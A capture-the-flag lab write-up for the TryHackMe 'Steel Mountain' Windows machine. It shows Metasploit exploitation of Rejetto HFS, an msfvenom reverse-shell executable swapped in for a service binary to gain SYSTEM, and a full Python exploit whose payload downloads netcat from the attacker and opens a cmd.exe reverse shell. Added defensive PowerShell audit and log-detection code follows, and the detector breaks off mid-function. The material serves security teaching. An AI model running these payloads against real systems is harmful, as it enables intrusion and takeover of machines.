Steel Mountain writeup [thm]
![Steel Mountain pic](../../images/steelmountain.jpg)
Hack into a Mr. Robot themed Windows machine. Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access.
Steel Mountain is the first challenge in the Advanced Exploitation section of the Offensive Pentesting path.
This post contains some spoilers.
Let's get started!
Introduction
In this room you will enumerate a Windows machine, gain initial access with Metasploit, use Powershell to further enumerate the machine and escalate your privileges to Administrator.
Who is the employee of the month?
Visit $target in a web browser. There's our employee of the month. If you don't recognize this man, have a look at the filename or do a reverse image search.
“Think about it [REDACTED]. If you died, would anyone care? Would they really care? Maybe they’d cry for a day, but let’s be honest. No one would give a shit. They wouldn’t. The few people who would feel obligated to go to your funeral would probably feel annoyed and leave as soon as possible. That’s who you are. That’s what you are. You’re nothing to anyone. To everyone. Think about it, [REDACTED], cause if you do, if you let yourself. You know I’m telling you the truth, so instead of wasting anymore of my time, I need you to go call someone that matters. Because [REDACTED], you don’t.”
😿
Task 2 Initial Access
Now that you have deployed the machine, let's get an initial shell!
Scan the machine with nmap. What is the other port running a web server on?
```
$: nmap -p- $target
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-23 15:55 CEST
Stats: 0:00:35 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Nmap scan report for $target
Host is up (0.051s latency).
Not shown: 65520 closed ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
8080/tcp  open  http-proxy
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49164/tcp open  unknown
49165/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 113.56 seconds
```
The answer is easy to figure out.
Take a look at the other web server. What file server is running?
```
Server information  HttpFileServer 2.3
Server time:        5/23/2021 6:59:01 AM
Server uptime:      00:09:02
```
With a link to http://www.rejetto.com/hfs/.
This Rejetto HFS probably has a vulnerability we will exploit to gain initial access to the machine.
What is the CVE number to exploit this file server?
```
$: searchsploit hfs
------------------------------------------------------------------------------ ---------------------------
 Exploit Title                                                                |  Path
------------------------------------------------------------------------------ ---------------------------
Apple Mac OSX 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service             | osx/dos/29454.txt
Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service)                       | osx/dos/12375.c
Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure                   | osx/local/35488.c
Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation            | osx/local/8266.txt
FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution                    | windows/remote/37985.py
HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)                   | windows/remote/49584.py
HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)                   | multiple/remote/48569.py
Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service                   | linux/dos/28895.txt
Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)        | windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities             | windows/remote/31056.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload                | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)           | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)           | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution      | windows/webapps/34852.txt
------------------------------------------------------------------------------ ---------------------------
Shellcodes: No Results
```
Since we know that we are going to use Metasploit, it's not hard to pick the right one. Exploit-DB has some more information on the exploit, Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit):

```
EDB-ID: 34926
CVE:    [REDACTED]
```
Use Metasploit to get an initial shell. What is the user flag?
```
$: msfconsole
[!] The following modules could not be loaded!
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!] Please see /home/[REDACTED]/.msf4/logs/framework.log for details.

[... ASCII-art banner ...]

       =[ metasploit v6.0.36-dev                          ]
+ -- --=[ 2106 exploits - 1131 auxiliary - 357 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: To save all commands executed since start up to a file, use the makerc command
```
Then we search for the exploit:
```
msf6 > search Rejetto HTTP File Server

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec
```
Use it!
```
msf6 exploit(windows/http/rejetto_hfs_exec) > use exploit/windows/http/rejetto_hfs_exec
[*] Using configured payload windows/meterpreter/reverse_tcp
```
Let's have a look at the options.
```
msf6 exploit(windows/http/rejetto_hfs_exec) > options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     [REDACTED]       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic
```
We need to set RHOSTS, SRVHOST (probably) and LHOST, the last of which was set to my real local 192.169.x.x address instead of the VPN interface. The target port, the path on the target and all the other required options look fine.
```
msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS $target
RHOSTS => $target
msf6 exploit(windows/http/rejetto_hfs_exec) > set SRVHOST tun0
SRVHOST => tun0
msf6 exploit(windows/http/rejetto_hfs_exec) > set LHOST tun0
LHOST => tun0
```
We are now ready to pwn this machine.
```
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on $tunip:4444
[*] Using URL: http://$tunip:8080/hKz2pL
[*] Server started.
[*] Sending a malicious request to /
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
[*] Payload request received: /hKz2pL
[*] Sending stage (175174 bytes) to $target
[*] Meterpreter session 1 opened ($tunip:4444 -> $target:49188) at 2021-05-23 16:57:07 +0200
[!] Tried to delete %TEMP%\FgXtiY.vbs, unknown result
[*] Server stopped.

meterpreter >
```
We're in! Let's grab the user flag.
```
meterpreter > pwd
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
meterpreter > cd c:\users\bill
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\bill\Desktop
==============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2019-09-27 13:07:07 +0200  desktop.ini
100666/rw-rw-rw-  70    fil   2019-09-27 14:42:38 +0200  user.txt

meterpreter > cat user.txt
[REDACTED]
```
It is done.
Privilege Escalation
Now that you have an initial shell on this Windows machine as Bill, we can further enumerate the machine and escalate our privileges to root!
To enumerate this machine, we will use a PowerShell script called PowerUp, whose purpose is to evaluate a Windows machine and determine any abnormalities - "PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations."
You can download the script here. Now you can use the upload command in Metasploit to upload the script.
First we download the script to our local machine.
```
$: wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
```
Then we upload it to our target.
```
meterpreter > upload PowerUp.ps1
[*] uploading  : /home/[REDACTED]/tryhackme/steel_mountain/PowerUp.ps1 -> PowerUp.ps1
[*] Uploaded 483.26 KiB of 483.26 KiB (100.0%): /home/[REDACTED]/tryhackme/steel_mountain/PowerUp.ps1 -> PowerUp.ps1
[*] uploaded   : /home/[REDACTED]/tryhackme/steel_mountain/PowerUp.ps1 -> PowerUp.ps1
meterpreter > ls
Listing: C:\Users\bill\Desktop
==============================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100666/rw-rw-rw-  494860  fil   2021-05-23 17:23:12 +0200  PowerUp.ps1
100666/rw-rw-rw-  282     fil   2019-09-27 13:07:07 +0200  desktop.ini
100666/rw-rw-rw-  70      fil   2019-09-27 14:42:38 +0200  user.txt
```
We execute the following commands to get a PowerShell... shell.
```
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > dir


    Directory: C:\Users\bill\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a---         5/23/2021   8:23 AM         494860 PowerUp.ps1
-a---         9/27/2019   5:42 AM             70 user.txt
```
We run the script:
```
PS > . .\PowerUp.ps1
PS > Invoke-AllChecks


ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths

ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths

ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit; IdentityReference=STEELMOUNTAIN/bill; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths

ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe; IdentityReference=STEELMOUNTAIN/bill; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths

ServiceName    : AWSLiteAgent
Path           : C:\Program Files\Amazon\XenTools\LiteAgent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath>
CanRestart     : False
Name           : AWSLiteAgent
Check          : Unquoted Service Paths

ServiceName    : AWSLiteAgent
Path           : C:\Program Files\Amazon\XenTools\LiteAgent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath>
CanRestart     : False
Name           : AWSLiteAgent
Check          : Unquoted Service Paths

ServiceName    : IObitUnSvr
Path           : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart     : False
Name           : IObitUnSvr
Check          : Unquoted Service Paths

ServiceName    : IObitUnSvr
Path           : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart     : False
Name           : IObitUnSvr
Check          : Unquoted Service Paths

ServiceName    : IObitUnSvr
Path           : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit; IdentityReference=STEELMOUNTAIN/bill; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart     : False
Name           : IObitUnSvr
Check          : Unquoted Service Paths

ServiceName    : IObitUnSvr
Path           : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe; IdentityReference=STEELMOUNTAIN/bill; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart     : False
Name           : IObitUnSvr
Check          : Unquoted Service Paths

ServiceName    : LiveUpdateSvc
Path           : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath>
CanRestart     : False
Name           : LiveUpdateSvc
Check          : Unquoted Service Paths

ServiceName    : LiveUpdateSvc
Path           : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath>
CanRestart     : False
Name           : LiveUpdateSvc
Check          : Unquoted Service Paths

ServiceName    : LiveUpdateSvc
Path           : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe; IdentityReference=STEELMOUNTAIN/bill; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath>
CanRestart     : False
Name           : LiveUpdateSvc
Check          : Unquoted Service Paths

ServiceName                     : AdvancedSystemCareService9
Path                            : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFile                  : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFilePermissions       : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'AdvancedSystemCareService9'
CanRestart                      : True
Name                            : AdvancedSystemCareService9
Check                           : Modifiable Service Files

ServiceName                     : IObitUnSvr
Path                            : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiableFile                  : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiableFilePermissions       : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN/bill
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'IObitUnSvr'
CanRestart                      : False
Name                            : IObitUnSvr
Check                           : Modifiable Service Files

ServiceName                     : LiveUpdateSvc
Path                            : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiableFile                  : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiableFilePermissions       : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN/bill
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'LiveUpdateSvc'
CanRestart                      : False
Name                            : LiveUpdateSvc
Check                           : Modifiable Service Files
```
Pay close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?

The CanRestart option being true allows us to restart the service on the system, and the directory holding the application is also writable. This means we can replace the legitimate application with a malicious one and restart the service, which will then run our infected program!
AdvancedSystemCareService9 looks promising:
```
ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths
```
Use msfvenom to generate a reverse shell as a Windows executable.
```
$: msfvenom -p windows/shell_reverse_tcp LHOST=$tunip LPORT=1234 -e x86/shikata_ga_nai -f exe -o ASCService.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of exe file: 73802 bytes
Saved as: ASCService.exe
```
Upload your binary and replace the legitimate one. Then restart the program to get a shell as root.
Note: The service showed up as being unquoted (and could be exploited using this technique), however, in this case we have exploited weak file permissions on the service files instead.
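As an added example (not part of the original post, and not PowerUp's code), the following PowerShell re-implements the two checks the note above distinguishes, unquoted service paths and modifiable service files, as a read-only audit that prints a fix for each finding. Function names are my own; it reads the same registry and ACL data PowerUp does and needs no admin rights.

```powershell
# Added example: audit services for the two misconfigurations PowerUp reported on Steel Mountain.
# Check 1: unquoted ImagePath containing spaces where a low-privilege principal can write to a
#          directory on the path CreateProcess searches.
# Check 2: the service binary itself is writable by a low-privilege principal.

# Principals whose write access on a service binary or path directory is a finding.
$LowPrivPrincipals = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users',
                       "$env:USERDOMAIN\$env:USERNAME")

# Rights that let a principal create or replace files: the named FileSystemRights bits plus
# the GENERIC_ALL / GENERIC_WRITE bits some ACEs carry instead of named rights.
$WriteMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Write, Modify, FullControl'
$WriteMask = $WriteMask -bor 0x10000000 -bor 0x40000000

function Get-HijackCandidates {
    # Paths CreateProcess tries, in order, for an unquoted image path with spaces.
    # 'C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe' yields
    # 'C:\Program.exe', 'C:\Program Files.exe', 'C:\Program Files (x86)\IObit\Advanced.exe'.
    param([string]$ExePath)
    $parts = $ExePath -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
}

function Test-LowPrivWrite {
    # True when a low-privilege principal holds an Allow ACE with write rights on $Path.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $WriteMask) -ne 0) { return $true }
    }
    return $false
}

function Get-ServiceBinaryFindings {
    # Reads every service's ImagePath from the registry (readable by standard users),
    # normalises it to a plain Win32 path and applies both checks.
    Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\*' -ErrorAction SilentlyContinue |
        Where-Object { $_.ImagePath -and $_.ImagePath -match '\.exe' } |
        ForEach-Object {
            $svc    = $_.PSChildName
            $raw    = $_.ImagePath.Trim()
            $quoted = $raw.StartsWith('"')
            $path = [Environment]::ExpandEnvironmentVariables($raw.Trim('"'))
            $path = $path -replace '^\\SystemRoot', $env:SystemRoot -replace '^\\\?\?\\', ''
            $path = $path -replace '^system32\\', "$env:SystemRoot\system32\"
            $exe  = ($path -split '\.exe', 2)[0] + '.exe'   # executable without its arguments
            $rest = $path.Substring($exe.Length)            # arguments, if any

            # Check 1: a writable directory on the search path of an unquoted, spaced path.
            if (-not $quoted -and $exe -match ' ') {
                $seen = @{}
                foreach ($cand in Get-HijackCandidates $exe) {
                    $dir = Split-Path -Path $cand -Parent
                    if (-not $dir -or $seen.ContainsKey($dir)) { continue }
                    $seen[$dir] = $true
                    if (Test-LowPrivWrite $dir) {
                        [pscustomobject]@{
                            Service = $svc; Check = 'Unquoted Service Path'; Target = $dir
                            Fix = "Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\$svc' ImagePath '`"$exe`"$rest'"
                        }
                    }
                }
            }
            # Check 2: the binary itself is writable (the weakness actually used in this room).
            if (Test-LowPrivWrite $exe) {
                [pscustomobject]@{
                    Service = $svc; Check = 'Modifiable Service File'; Target = $exe
                    Fix = "icacls `"$exe`" /inheritance:r /grant:r `"SYSTEM:(F)`" `"Administrators:(F)`" `"Users:(RX)`""
                }
            }
        }
}

Get-ServiceBinaryFindings | Format-Table -AutoSize -Wrap
```

On a default install the C:\ root is reported for every "Program Files" service because BUILTIN\Users can create folders and files there, which is exactly why PowerUp lists it for each service above.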
```
meterpreter > upload ASCService.exe
[*] uploading  : /home/[REDACTED]/tryhackme/steel_mountain/ASCService.exe -> ASCService.exe
[*] Uploaded 72.07 KiB of 72.07 KiB (100.0%): /home/[REDACTED]/tryhackme/steel_mountain/ASCService.exe -> ASCService.exe
[*] uploaded   : /home/[REDACTED]/tryhackme/steel_mountain/ASCService.exe -> ASCService.exe
```
First, we shut down AdvancedSystemCareService9.
```
C:\Users\bill\Desktop>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 4  RUNNING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
```
Now, replace ASCService.exe with our malicious impostor program.
```
C:\Users\bill\Desktop> copy ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
Overwrite \Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe? (Yes/No/All): Y
Y
        1 file(s) copied.
```
Start a listener on our local machine.
```
$: nc -nlvp 1234
```
Then restart the AdvancedSystemCareService9.
```
C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.
```
That doesn't sound very promising, but when we check our listener we got a shell, and not just any plain old shell: we got root. The 1053 error is expected: our executable is not a real Windows service and never reports its status back to the Service Control Manager, so the SCM gives up waiting, but by then the payload has already run as LocalSystem.
```
C:\Program Files (x86)\IObit>
C:\Program Files (x86)\IObit>whoami
whoami
nt authority\system

C:\Windows\System32>cd C:\Users\Administrator\Desktop\
cd C:\Users\Administrator\Desktop\

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 2E4A-906A

 Directory of C:\Users\Administrator\Desktop

10/12/2020  12:05 PM    <DIR>          .
10/12/2020  12:05 PM    <DIR>          ..
10/12/2020  12:05 PM             1,528 activation.ps1
09/27/2019  05:41 AM                32 root.txt
               2 File(s)          1,560 bytes
               2 Dir(s)  44,155,334,656 bytes free

C:\Users\Administrator\Desktop>more root.txt
more root.txt
[REDACTED]
```
Access and Escalation Without Metasploit
Now let's complete the room without the use of Metasploit.
For this we will utilise powershell and winPEAS to enumerate the system and collect the relevant information to escalate to
To begin we shall be using the same CVE. However, this time let's use this exploit.
Note that you will need to have a web server and a netcat listener active at the same time in order for this to work!
To begin, you will need a netcat static binary on your web server. If you do not have one, you can download it from GitHub! You will need to run the exploit twice. The first time will pull our netcat binary to the system and the second will execute our payload to gain a callback!
The exploit is a short script written in Python2.
```python
#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
#              It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
#              It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux.

#Usage : python Exploit.py <Target IP address> <Target Port Number>
#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).
#          You may need to run it multiple times for success!

import urllib2
import sys

try:
    def script_create():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")

    def execute_script():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")

    def nc_run():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")

    ip_addr = "$tunip" #local IP address
    local_port = "443" # Local Port number
    # Updated Line
    vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%3A8080%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
    save= "save|" + vbs
    vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
    exe= "exec|"+vbs2
    vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
    exe1= "exec|"+vbs3
    script_create()
    execute_script()
    nc_run()
except:
    print """[.]Something went wrong..!
    Usage is :[.] python exploit.py <Target IP address> <Target Port Number>
    Don't forgot to change the Local IP address and Port number on the script"""
```
The vbs line in the script was changed according to this.
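Each of the three requests the script sends has the same shape: a search parameter beginning with a NUL byte (%00) followed by an HFS macro block {.name|...}. As an added example (not part of the original post), here is a PowerShell check that flags that signature in web server log lines, including the case where the braces and pipe are percent-encoded too. The log lines are constructed for the demo in a CLF-like shape; HFS's own log format is not reproduced.

```powershell
# Added example: detect CVE-2014-6287 style requests against HFS in access-log lines.
# Signature: after URL decoding, the query contains a NUL byte followed by '{.<macro>|'.
# The log lines below are constructed for this demo (CLF-like), not real HFS output.
$SampleLog = @'
10.0.0.5 - - [23/May/2021:19:00:51 +0200] "GET /?search=report.pdf HTTP/1.1" 200 512
10.0.0.9 - - [23/May/2021:19:00:52 +0200] "GET /?search=%00{.+save|C:\Users\Public\script.vbs|dim%20xHttp.} HTTP/1.1" 200 0
10.0.0.9 - - [23/May/2021:19:00:53 +0200] "GET /?search=%00{.+exec|cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs.} HTTP/1.1" 200 0
10.0.0.9 - - [23/May/2021:19:00:54 +0200] "GET /?search=%00%7B.exec%7CC%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe.%7D HTTP/1.1" 200 0
10.0.0.7 - - [23/May/2021:19:01:10 +0200] "GET /?search=quarterly+report+{draft}.pdf HTTP/1.1" 200 2048
'@

function Get-HfsMacroInjection {
    # Returns one record per request whose decoded query contains NUL followed by '{.<macro>|'.
    param([string[]]$Lines)
    foreach ($line in $Lines) {
        # Client IP and request target from the CLF-style line; skip anything that does not parse.
        if ($line -notmatch '^(?<ip>\S+) .*?"(?<method>[A-Z]+) (?<target>\S+) ') { continue }
        $ip     = $Matches['ip']
        $target = $Matches['target']
        $parts  = $target -split '\?', 2
        if ($parts.Count -lt 2) { continue }                 # no query string at all

        # Form-decode the query: '+' becomes a space and %XX is decoded, so %00 becomes a real NUL
        # and %7B / %7C become '{' and '|'. Re-encoding the macro syntax therefore does not evade the check.
        $decoded = [System.Net.WebUtility]::UrlDecode($parts[1])

        if ($decoded -match '\x00.*?\{\.\s*(?<macro>[A-Za-z]+)\s*\|') {
            [pscustomobject]@{
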